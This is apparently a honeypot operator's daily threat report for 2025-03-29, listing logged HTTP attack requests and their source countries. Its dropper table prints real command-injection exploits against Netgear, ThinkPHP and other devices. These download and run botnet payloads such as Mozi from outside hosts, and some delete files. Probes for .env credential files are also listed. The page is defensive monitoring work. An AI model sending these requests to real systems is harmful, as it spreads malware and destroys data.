Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-03-29

·486 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-03-29
#

Interaction report on http service of various honeypot around the world.

ot_simplified_report
#

Simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
CNGeorgia
MY
LV

botnet_dropper_behaviour
#

List of requests suspected of having stage 1 dropper behavior (programs designed to extract other files from their own code).

remote_addrrequest
42.227.166.156GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://42.227.166.156:52343/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
103.207.124.231GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
178.72.78.8GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
120.85.117.186GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
31.170.22.205GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(cd+/tmp;wget+http://31.170.22.205/dl18;curl+-O+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1
141.98.11.210POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20sex HTTP/1.1
118.40.165.223GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://185.225.75.8/bins/vcimanagement.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
31.170.22.205GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(cd+/var/tmp;wget+http://31.170.22.205/dl18;curl+-O+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1
180.153.27.22GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
58.242.106.187GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
182.84.138.11627;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
88.247.162.58GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘rm -rf bejv86; wget http://176.65.134.201/bejv86 -O /tmp/.Aqua; chmod 777 /tmp/.Aqua; /tmp/.Aqua thinkphp.selfrep’ HTTP/1.1
185.233.117.25GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://152.42.234.215/bns/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1

request
#

List of requests of the day that have never been detected, other requests that have already been detected and archived in the request database..

number_of_occurencerequest
2254GET /dependencies/.env HTTP/1.1
2393CONNECT pro.ip-api.com:443 HTTP/1.1
2403\x04\x01\x01\xBB\x00\x00\x00\x01proxychecker\x00pro.ip-api.com\x00
2672GET /robots/.env HTTP/1.1
2702GET /~admin/.env HTTP/1.1
2922GET /upload/.env HTTP/1.1
2942GET /html/.env HTTP/1.1
2952GET /v1 HTTP/1.1
3531GET /Laravel/.env HTTP/1.1
3571GET /.config.yaml HTTP/1.1
3591GET /data/.env HTTP/1.1
3611GET /inc/.env HTTP/1.1
3621GET /misc/.env HTTP/1.1
3691\x04\x01\x01\xBB@\xE9\xA2\x93adm:12345\x00
3831GET /Api/.env HTTP/1.1
3841GET /doc/.env HTTP/1.1
4001\x04\x01\x01\xBB@\xE9\xA2i\x00
5951GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&TPFME=BK0NI HTTP/1.1
5961GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&J6EHU=ORME4 HTTP/1.1
5971GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&WAL7Z=NBHQW HTTP/1.1
5981GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&UM446=FADMG HTTP/1.1
5991GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&6K4U8=807YZ HTTP/1.1
6291GET /vicidial/welcome.php HTTP/1.1
6651GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&5XVSK=28GHM HTTP/1.1

country_iso_code
#

List of country names and number of requests received by IPs located in these countries.

number_of_occurencecountry_iso_code
01035NL
1395US
2382BG
3323GB
4174CN
5168MY
6104SC
783HK
865PL
963IN
1055CH
1153KR
1252BE
1351SG
1447VN
1525LV
1621UA
1720DE
1820LT
1913RO
2012FR
2111PT
2211NG
2311GH
249CA
258JP
266BR
276ID
286IR
295TR
304RU
312CZ
322AZ
332AO
342ZA
351MC
361BD
371AR
381ES
391TH
401RW
411GE
421IT
431AE

Related

Report: 2025-03-28
·589 words
Repport Daily
Report: 2025-03-27
·530 words
Repport Daily
Report: 2025-03-26
·2766 words
Repport Daily